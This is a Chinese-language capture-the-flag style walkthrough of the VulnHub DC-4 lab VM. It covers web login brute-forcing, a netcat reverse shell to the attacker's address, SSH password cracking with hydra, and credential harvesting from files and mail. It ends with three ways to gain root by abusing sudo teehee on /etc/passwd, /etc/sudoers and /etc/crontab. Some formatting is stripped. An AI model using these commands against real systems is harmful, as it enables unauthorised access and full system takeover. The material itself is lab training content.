vulnhub系列靶机-DC-4

发布时间:2026/8/22 23:29:14
vulnhub系列靶机-DC-4 下载https://download.vulnhub.com/dc/DC-4.zip目录端口没有用的网站是暴力破解得账号密码XSS和sql试过没有用之后现在去暴力破解找到账号密码admin happy登陆后发现远程代码执行有一个登陆页面而且是POST传参那就可以用bp控制参数建立反弹shellbusybox nc 192.168.113.145 1111 -e shnc -lvnp 1111python3 -c import pty; pty.spawn(/bin/bash)find / -name flag* 2/dev/null再查看/etc/passwd时发现这三个用户有/bin/bashssh登录jim用户cat /home/jim/backups/old-passwords.bak这可能是ssh连接的关键hydra -l jim -P /home/kali/Desktop/password.txt -t 4 -I ssh://192.168.113.143找到账号密码login: jim password: jibril04登录sshssh jim192.168.113.143jibril04查看邮件cat /var/mail/jim找到charles的密码^xHhAhvim0y横向到charles用户想要ssh登录charles时发现不行那就换一种思路用jim用户本地登录ssh jim192.168.113.143ssh charles192.168.113.143看下charles的sudosudo -l可以看见用户charles可以无密码以root权限运行/usr/bin/teehee。teehee是一个可以追加内容到文件的小众编辑器这为提权提供了可能。提权到root用户 方法一写入新用户到 /etc/passwd最常用这是最直接的方法核心是利用teehee在系统用户文件/etc/passwd中追加一个uid为0即root权限的新用户。执行命令在终端输入以下命令echo hacker::0:0::/root:/bin/bash | sudo teehee -a /etc/passwdecho ...准备要写入的文件内容。|管道符将前一部分的输出传递给后一部分。sudo teehee -a /etc/passwd以root权限运行teehee并用-a参数将内容追加到/etc/passwd文件末尾。新用户解释hacker::0:0::/root:/bin/bash 创建了一个用户名为hacker密码为空UID和GID都为0root权限家目录为/rootshell为/bin/bash的用户。切换用户命令执行成功后切换到新用户即可获得root权限。su hacker因为密码为空按提示输入密码时直接按回车即可。⚙️ 方法二修改 /etc/sudoers 文件此方法将当前用户charles直接添加到sudoers列表中使其能无密码执行所有命令。执行命令echo charles ALL(ALL:ALL) NOPASSWD:ALL | sudo teehee -a /etc/sudoers这条命令将charles ALL(ALL:ALL) NOPASSWD:ALL追加到/etc/sudoers文件末尾。验证权限之后charles用户就可以直接通过sudo执行任何命令了。sudo /bin/bash⏰ 方法三创建计划任务 (Cron Job)此方法利用teehee创建一个由root执行的定时任务来修改/bin/sh的权限使其具有SUID权限。执行命令echo * * * * * root chmod 4777 /bin/sh | sudo teehee -a /etc/crontab该命令会在/etc/crontab文件中创建一个每分钟执行一次的计划任务由root用户将/bin/sh的权限设置为4777即SUID权限。等待并执行等待一分钟左右让计划任务执行。然后运行以下命令获取一个root权限的shell/bin/sh -p-p参数可以让SUID程序以原始权限即root权限运行。